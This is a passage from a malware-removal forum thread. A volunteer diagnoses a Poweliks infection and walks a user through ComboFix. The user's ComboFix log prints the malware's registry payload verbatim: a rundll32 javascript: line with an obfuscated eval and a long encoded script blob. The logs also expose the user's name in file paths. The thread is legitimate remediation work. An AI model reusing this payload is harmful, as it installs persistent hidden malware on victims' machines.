Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/23/2014 04:24:01 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\HISTORY-JOURNAL> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:53 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\MANIFEST-000002> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA-JOURNAL> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES-JOURNAL> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOCK> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:46 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\000002.DBTMP> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
 
System errors:
=============
Error: (08/23/2014 04:23:55 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (08/23/2014 04:23:32 PM) (Source: WMPNetworkSvc) (EventID: 14325) (User: )
Description: WMPNetworkSvc0x80070424
 
Error: (08/23/2014 04:23:31 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: AVGIDSDriver
AVGIDSShim
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: vToolbarUpdater%%2
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: AVGIDSAgentAVGIDSDriver%%31
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Computer Browser%%1060
 
Error: (08/23/2014 04:13:21 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
Error: (08/23/2014 04:09:54 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
Error: (08/23/2014 04:04:22 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
 
Microsoft Office Sessions:
=========================
Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-08-23 16:55:09.878
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.753
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.581
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.441
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.223
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.113
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:08.989
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:08.879
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:54:50.034
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:54:49.909
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz
Percentage of memory in use: 54%
Total physical RAM: 3069.46 MB
Available physical RAM: 1392.41 MB
Total Pagefile: 6375.2 MB
Available Pagefile: 4531.66 MB
Total Virtual: 2047.88 MB
Available Virtual: 1882.66 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:223.01 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS
Drive f: () (Removable) (Total:14.61 GB) (Free:13.1 GB) FAT32
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 14.6 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=14.6 GB) - (Type=0C)
 
==================== End Of Log ============================
Link to post
Share on other sites

Minion%20Welcome.jpg

My name's Naathim and I'm a GeekU Minion! Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat :)

Before we start please note the following:

  • Analysis and research take some time, also sometimes real life gets in the way, please be patient.
  • Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
  • Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
  • Paste the logs in your posts, attachments make my work harder and more complicated.
  • Stay with me to the end, the absence of symtoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, what may cause some delays between answers.

I can't foresee everything, so if anything unexpected happens, please stop and inform me!

There are no silly questions. Never be afraid to ask if in doubt!

Let's start and enjoy the fight! :)

warning.gif Rules and policies

We won't support any piracy.

That being told, if any evidence of illegal OS, software, cracks/keygens or any other will be revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!

The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result with closing your topic and withdrawning any assistance.

You have got Poweliks infection.

51a5bf3d99e8a-ComboFixlogo16.png Scan with ComboFix

This is a very powerful tool that should be used only if advised by Malware Analyst.

Do not run ComboFix on your own!

Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.

Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

  • Right-click on 51a5bf3d99e8a-ComboFixlogo16.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Accept the disclaimer and agree if prompted to install Recovery Console.
  • Do not take any actions while ComboFix goes through your System - it may cause it to stall!
  • This scan may take some time!
  • When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).

Include that log in your next reply.

icon_idea.gif If you'll encounter any issues with internet connection after running ComboFix, please visit this link.

icon_idea.gif If an error about operation on the key marked for deletion will appear after running the tool, please reboot your machine.

icon_idea.gif Don't forget to re-enable your previously switched-off protection software!

Link to post
Share on other sites

Hello, Naat.

 

Here's the Combofix log. I see a reference to the Poweliks infection you mentioned.

 

ComboFix 14-08-21.01 - savas.kyriakidis 08/24/2014  15:26:27.3.2 - x86
Running from: F:\ComboFix.exe
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         #@~^WX4AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+* Y.zPhxlc3XwC NAx\bDKU:xO?DDrUT/`rYhbxNb.YJ*ia'A_Ew'/z/Dn:2 wwSkx[GS/2WSnM/4V^--7FcT-'wGhDd4VVcn6Ji6xU+SPzmOk-nor8L^YvJj^MkwOr o sbs?zkY:r(L^Yr#I0!x^ObWx,^N `#PO.XPDY;DU~mR]+T]+mNcE_|S\w'/G0DAmDn'-skmMWkG0D-wxY~WMl:AWM3PknOEa-'x[www7  !cX!F {w'/wEbp8^lD^4`n* M+Y!D ~!p8N0!x^ObWx,[`!# XxU+SPzmOk-nor8L^YvJ\dX:V+ U+.\.oHJ_K:nR+RZE#p6 Wa+UcrM2:E~!~0msd+*iXRd+U[v#IE6U'mR3aalx[3 \rDKUs+UD?DDk okcJuYn:a]wwr#_! /!4/D.rxT`!RsldO&x[+X60vJ&E*_FbI!0UY{;6xQrRD:wri!WY{0 ZM+COK+XOsbV+v;WxD~DD;+SR8#Ik6cE6Yb`!0Y MkO+vacDnkwKx/AK[X*i;0DR/sK/+vbi!0'6 /DlD+P+aOwks+v;0 ~O.!+#I;6Yx0c!YobV`E6xDbi!0d'!0O }w+ )/:+6DjODls`bi;WkR]+m[`y#I;6R.rD+cE6dcInmNvE0DRUryO+#*i;WkRZ^G/`#p;WR;VK/n`bI6R9+^nYsrs`EWUD#Ilc]!xcr-rJ_!0 QJ'J~z$ErnDPz GD/Ym.OJB!BFbiW G+s+DnsbVnc!0xbI)8Atbs`Z6RwkV2Xr/D/cw*#`r6`m9U`*''Zb`NvJr#I8[crtOYalzJNGA VWC[c:rmMGkWWDR1W:JNKAx^WCNJb&{J*zz{*~Z!8{Rv2ZAO*G9 %obWRbwAX/yFA)/lc&bU9WAkvc!OnAO%O&TOX% s/Erbi)`lc3U\bDKxh+UOvJKDK^+k/Eb*`JCE*'Eka,`,:+XYRAx1GNbxLT=))j;qqc!+D?YMrUov$;WU\n.DTl)w.WsACdvcjOMkUovv9CBl+y}F(:gTlq,;qVNVn8At1hsDqZ48iMwXIqV[!jXFs~-myVTCq,EKPz/Pw;\MoZ429*h?"im .s|j!L 8I*1!.((.ZLBs~t1:oYtp"V^xtd8A4^ssYtp"V^k4}(&HaNVV\(LZa|j!L8IX^V.N&/IU}("q^:lj($VK#D8 ^V(U3{BwI*^!jZ[^d\M#HnjYA1C~34yF4lq*[6Nwf9p9H}lT]MOYIsEJV"Vt:^;}`IX8ssYC gA^&gs(Bk+UoW::jfS`,rls.%[;AKp1Z}Z;i:j:(M#L[!^\8kl$m21s8q9/nilt8`G&VB^}s6VI&"s}AIs4V.UeoIV&r3aSsDPn(g!\TEihj:8Mj%NVV-8b*s8 ^!J3w"1 #D5s6*5xj24VIsm0s%ey.y1q!+rVxq8k0E"M#:C lV]C^;5qF2eZF\tuj/t?TrUXg}qF\1x^H4yIq4VjrJ;I:I 6.}?0;]Mj:mXV#u^ht?TrN;qd(01/epgyJs~qI:aa5H6K\wd}qpdpq*"C`1/Ip1.S2wq[MOf(Moy^z&/ FgXm2Is8U*1[ X!Cg41&]A}q6V\ wT}j!2rHIinoAV5U.a4M"s^kl2\tw8hjf8 l"N_9qe2I\^rTkiV"P1M#Nlqs/::wO}U6(lqIs} VKm mkjCjr8M^L&ka4if^y[MjOS^9sts6Vef"w8 W;5 ok4VVE\!g-4 }s4 I28y*yoPW+j&"48:"t1:}/Bo~t^:wO}oIs^ HwJsgV[2^O1Ma^4q.E9MwTlq,;Is64t2HW&s984x"28`/:oEe 9VtZ&2rHIinoAV}Ujw8M"s1kXA}q}w(:jH}oIG4ypG(0VE9h,M}?&d(V~FI:awezXqC"sp VPCqm/Phj&i X-9Zaqlo9!9wdqbhVjs.T[o9EjuVS}?SViMwXIqV[!jX^X0;jy.TjqFh8!jYtlTI(]a4y*M(MwUmHorj .;[VVY\j6g5l4t j3&kVG^hj![(x;q;IinoAV}Ujw8M"s1kXGms.t9Mji+oAs|;3{Wq}F(h1ZlO;(M9tF$t^hwY(Z48jVszeqFV[!jXFs~-1 sZlq,EhKzdKqs;}VsT829*hjI`mxjsF.ZoqFH!^h^EtFZL9AF-t_./tjX4iMwzIq^NV.Xns~-myVTlq,;K:2/: s!}MwT8&x*h?]j^UjVF.ZL81T^sVEtqZoBs~z( H^}_.X\?0{9w1Xm2Is8`sy1+.D5:XXK.DA1C$28+8tCl[rNw9[o9Xt l!]MOOIs!S0NV92w"my.O5s62toHWnp6olMjzt?8nI:2Vef"GBsR;Iy6-ess/}pgyt8r(CsG5q1W\?zOpq*Vq;IWJ06\I+sZlO;JVgh(Ms!F/xmpZ&2H!apU*s^pjt8CtG&VHlm2IV(?lV4Vhr|o!{Bw.E1+ss}jl4[M^ \jqV[!4\tCt19w1X^2IV8iwy^ jOI:alS0NV9s"XmVjGq0F2e29\1+,sNZlpCWytkX.8Ugtt:j65oI2[s.1tp"W8 ""&kVFms.!9(x;q;I#4 14ts.rIpIaN:jHt("W( ]yJV9V[28sNVt-t;ok]+j!iCx-I!o0}_9V1&tr|U*B4 }-CyjWx!*84MSd}Z44`&sy[!jYJVxq4 I28qjEj l!t(x-1sH^m }wI j"S0t44sIdtj9V\s!KK:jfJjOkm:#L[/~Kn(gT}q!;i .E[!^Yt?lB(x]^ms,h` jzNsV%}oH;jVsE\!6^j:jhFZ4r\(^YP+x;tgTqAV;[wA!^r0/Bsj;1 os}`*t9M^+}`FsNVt-t_HE"+.ZKjTCMO3nZBCtp"18 "q4V.(eq*38!`kF?lB(xt7lyjWxMlq4Vhdp;oVPq,39 6^|?02F?S3`CB\e+j3[(xs|U3{WjYZnp"V F8[&Z]SnjYf( l+}o9T(:W] 9\(i94m `+Hsg!1:sEtzTk#V^+mym.nV,t8p"}e8 (sj.8V("&~Xs,dIsFdC_sk( snjVa* wYj:qw##9V#!9Am8w-8A}\]h46PKx4UVB4?^Vtm3aOlj.pl8Nu82.l(+6VmMXG^.aCIj2?e 4}e8*4qV##2s(]+w|i:w*(sj.2.lU!jfp`s$pooA As( 6l}28V]x4qj:4k]i4qi:gGmy9u6qwcCq41}j^T5j]VKZI&5(4p+GAejjIu6qtl: IVHjj*^s^E:24?t!4We ldp t. V1AP "M^!jV(M]VIAt?IVxX5N96p oA#.Il"q9lV9rjsxkC2L6oaM[:99K_V!t`6f#+w2t.gfq]:.Z6Lj2g6.^wU+b,X[ V;`sqMlX]#:82UV#: hKX[ D!H`9.t`p\[f4*H:O}d!]&j:.n}MTa+s,T.01B[A1pUpIwIj42]sa:\!oa63dhtjg9kv1/n`6(}qghijxu"f4 jvsad&wf}v.2?^tsn`w?\#1VN!A.]9x5joAPfgHCKwo:5*8`65tp^HtMj2:sBsl`62Ug}N_NjIVViZNxtsoWpjw}j ^.ty$;##4I}?OBmw9hiZ6?tU^H M\]"fBxmA.Z\2A+j0q"jqI]8b,?\UVA}:\fp:gfj!]:tu9rtswk?sis}zwjtsgr#mx$x[g4ac*u("6r`va5z9r}`i*"uanimx/\jxD5!}D}P^*HL"}1Ap"#`Iw o4&Jy~egMVSGInts4.5y,pK^9%}^s.9%Vqr2^T\jg99#I}VjA}j^(IZ9/]`sA]f~Aejw$9!o~p`py9L^.`N-pU%X}Zw?\hVVN!A.]j\x"joAjp"H#3^64GV$}ZhDi3OD]f9V:2txHj.C`!w+jNt181f w1guIdp!^"njRcgKBA8f\nCMgdHA}t[GVfjp"*]2^(U2B;I`sA5.z"l:1-I`2-C wh5j/.j&9rJFx:`!]&C 1F#M\j+owt[_Np}#~&CK5+5jo~p`sxt&9/IAs/Hw1t\:tA`pVtIC9}j.j:}.e!j XMHj^epqI9[`65[qw2 M\51347mZIWI!&qp^2.H2NK^Ztwt9HZlVj]jjw/"Z13t#5\#:\9?02tiaizjiz&}j4e\MVSGIx}Mg#}2W*pqIr[`6;1#s~pjw9jV"V5!a;^iwA}jw9KG99[V.r}#~9tyxet2ohm.9wt.4UK8}eHV1#Z*9hwU1:l]Ca5m!sw#s4&]f9%ww- w13}p^ZHCI*`2o~p`ph5j8jpj9aI_tfP;,j\VqX1jw!\K^A`21w\TjsCM\CHomT[AVpjp"1}!gG1jo_4Zq\tFjBp:t5S.As^Z11}39sMX+jx9W5joxtp99}.w$pj} sZ]+9APjw$5(t pjsA5jxp5qN3SZ}4no9f`TNt13^e[25!j2XAiiwA#Kw%+NqaPs%\["4A}j\ed&]Gjq,A`jw$Ko19K;,t[0%cgUq7IVgX^!gK"!t&}jDnC:9op`sB^.3\jfg|j.9G1&B lyt\kOer:VG4yNJHAw9`U}b.:\hex4d`oq}i5\\K"epqI3\`stj!^F}Fg!`sjjqYC`ZOelV1/HA6B[^sSt#sMIjX.]2wI5jon6iIX}O+js3"iqYsjPAcj3xP:CsyKyYcmFw#I0s9I_N$#HYA5Vs~pjO"}!Zc5!t&}jDsj9op`su8Zttj#gF}Fg!jk1W.sYX5DGloWAN29$Cytx}osglMg/\jj5xoK#+^1^:9.l;%fiqYS}ijA}.z-qMo;j`Yfmj96j01]j.}6w5\Uf1n?.^e}j5!jM#A}iwAPK4/pqN\`F1ipgW]f\6jjq"mytL\F95.ZIoKAVp8ZVt:hV8pFg!#kOcj:OX} DWty4]Kqt%}Ns?H+D.} 9-mMVWIZ*.5j9F.01]jqVG}0sW:VWX|FgT]jaZ5:0Fj""|j.\!48IJ6Aw9i#9X}jw$5.#_ljVX9 DG.s6eSZ}e}21f`TNA+2x*^jwM5Ve\HqwDj!wop`s}J8tttTl\\2k*U3sq;,MjFg"p81uI_t$n`}&Uo}I}&KaPj8I1 42\T^SnC9 5ZF]^ytAiiwA}jDoqjH24yo\g!w$I`s$pqs6i2}f`T}o.:I*#:gS9!29 #~s]j"}5^ja}^5\HqwDj!wo5jo5S8t\`:9\pyV!.;%f}`ss5is~pVw]i3wA5V3\HqwDj!wop`s}J8tWtugpCsjinX07rq,AUjw$p`}6.b,*#y,69+YKfw+J&"f`.#AiiwAJ&4#529$Cyt5Cs~A s^("jH~I`sA:j^op`}pKGNBiV/DUit.mjwo}jwMqV4;##wDjj\/4ZsUj`sAi94j3DfU3so4ZNt\!\apo5*.0,J[Zw9qp}2}XRfJ!5!`!HA}iwAPK49Ks}9ijs6HUjX^Kx-5F[_48sl( Xo?09]+ N!6qFwj#sMIXsPVxf`.#.]hxqi3g]}y}f}`sAt%4]!DfU3s\As3j.a-SH%-Sy5aeb,M`T1.pFgu]x9qjKB;##wD]2\9K^99ij..]hw|t3g]q?1W.q,X5DGlV1/H`tt[A.|5VYt+j8(^2gAnyB*eT4x}!9tI_Vue`w2i 9|} ^u:C48mZY9L4 ?AYf?0VtiA3\tPV^l?D tC1X(!ottT5\t2g]KU,*#:AX} DWtXO5d ]hHjst:w(p81(4Z9+eb%\tip7I:w9^3gKUC(X#s9re3gPKqNsn NA}iwA#KwCqMoDNwVt(.\Olj.pKjNu^_Vl(+6Vl:XG^xYIj2? Vx}e8 4qV##81(]f~y :Od":aVl_s1t:wFj^wCqs5jsFwj#N\.!9-[.a\(2tY8!46 394?^9CnwV16p"YC.jp\oD+wVl( X!4ZN4?^94jsFwj#}NNj5.\3wA"24?##x1eLx!l2oA#0Vj]+Xwe&gV"V]_I VVj.\O+GA jq.o]ZV5jV6&jV"jjsa5`Voc\o`!e ZXl^s%tA}p]qxDe 8 ((LS.0sLt!OBw.\?w9jCAIkt!68+f~#e w5`x$}e+"Mjj9*mV.O#ZV5iq"qi:"j"M(SK Vcts4t^N!Hww%tA5y" 685ygijsxV5:4k8il/CjI"l2oA#q,? !4ht28V"3aVjs,L(.\O+GA#N8VpiZV5j36&j:jG#Mj5:3Bc\o4ye39*N^3*tA5c]VWhe 8d((LSGAk(jBV}r?w9 i }k"q.++f~ j8wgOkP "MF!1Xm8wpjAt?tUT6t2"H(LS.`sH(.x"50VG}A9HtA}f"".k}243jsxICH3\hS nf~#j`6Oi 1kj 43]38V"xo;1AFn1VxOlj.pm2oA#2.Dj 2HlL92jf9&5jol8+XM[39PlAF$}`sAP "M^&tz5#M.sFcts1zHsN(?w9rCV*v\Uw++f~pF!\s(j]yP "M[&".?.V6\qFc\o4C}3Xq:so~+`I&5(^\rAV"H^w-PbYH5hoXKf"TF!89tjX;j X3e!g+1q3A\oNA6!8r]3"OUFt;.ZF1(sw6l^Arp8se#`W\to}2}yta[!"q:Msx\"w&]24]r`%-}Nscjp56^2^T"F$xNA.1UM93+V,T1AwB[AV9UpI"?2^T}j9A`ZOA69"2\Odrow3i;,w#Px9C.\p"sIHq,wj.\UK.tHjVt-#`sA5iIHIMOT\399(fohPf\fCKwpIq3A\0Vw\o41]f9%"#xmZFFq(t*}yN}KyV#\o1;j#}wp?RT^sx(j25 3gHiV49Kw}p[Zphjp~s}Vj]gVB;.0.3`W-j^t9IV}e}jAL9#NA}V4$iM"I:!2:#qg|#s9XK^Iiiow&}+Xre3^T::Bxmw.Zjsw3+`IA.`IiiNsZmT1A|!AXnKI!`f]2\qj2C.T"jq3"\q,?H!S*ej"T}.s&?Z}.tjO6j^sGjU%a#sYw}i1tjaXPMaZ5!oA}iwACK"]jqt$}`sA}#~SC.\ (!Tl? sM"kR"row}H^1B8A}}"u}AIf"4jjwA5jo;#ij1C.j my3A# 1w[TwvJ&96":oxmw.pjVA+I0IGH`9.t`p\9fAlrs^}J!gE`jqx\o\y]3jt1yIp} 3XPf"}e?OtjVXjotsU(goKjs6.ss$P0}tU 6053^"jK\vU!a3#+^| s49K^I3]`1w\q\&]f1qt2X0jjA!m:kfr:1#?H%A# NIqicl5!x!nK`!:LsL}VIh]ZRXIs9B[A*kjpg1Cj"+:M]Nm 9fq("!50V"IqN-8A}}UPsVI!\/#s`!tjt]V5\#V9jjU%a wswJTgri:jG`.iXKZ*?\:4]S.s l8.}6j5hU 6V30a]3DM"Z13e#5\#:"/.VV# A!\6 wri:gG`2j..I." Oo.:paI s!];,jT22Nygf^:0hq2swnVgHtV4XKstf}oNA}ixIJyw mF#x?AtA53w$p`}hS8}pi^2\tqtxSywt62Rc:L4A\hO6#!\3S8}%nV}5Cs~A#y"}":]g401Z5jx lUY*j^. P^NtUA~5jw$[!wA5XOA]VwA}j\t+b%atb,3i aq}Vjf2HlI`*A5jw$S2tp?osfCytw} m2H&1.]^I5joAjPwMF!\/.ys/n_9fCi\jJyg#UsIH.tc9F\HKjs"lAIU}`sA`9tql2D"j3^}q2o3]qx5#Lw6.w5atb,3i aq}Vjf2HlIjAA5jw$S2tpposfCytwdT22rKgj]:w }.[c[q\1P.w"lA.$}`sAi94 jD"U3s\H`5\"3xpS2t#r_sfCytWIT1tj:\*\2j\`f]S8sjrnC9 K`F]^ytsiiwA}jjh13B4K^s1`(gG. 5*.s,J^Zw9\p1tS&4p#(w&m 4\\iwc}&^uK_oa6q.(6!lf}3w/j:VM+`p&"sxi.s,TH`1!t_sC"UIXI O+]sa\(2e&]h4YC.jeNqsU]Z*?tp4ICVjtg2T7rjswqftA+GAeNH,J6Aw9\%tq}!Dfj3^}j2o2Hox*}.w$pq3A 0.w##4DCVjemF#xH`}v"3x-?yN]p`sB\`5D"VI&pVjfn2g*"jtA}iwAC.I"KqVe\8sw 9g}C.T"jsIHy1wqfgUljo"4H,*#NtX5 YKKy4%iMafm!BA}igri:\*jjj-6:2dp gm#2"o:2s"`sa5j5-i^ipm01p]z}&5jywrc9$}jw91 ]1jfg|j.0ai01!}^t\hOlJyge}C42.0F1`(gGp N$p`s}J8IWITs5lMxU}jwA5!ar sgX}Fg(?A9#[2tfnij9}jw$5?0l5`pDUMO}lww.p`s$} 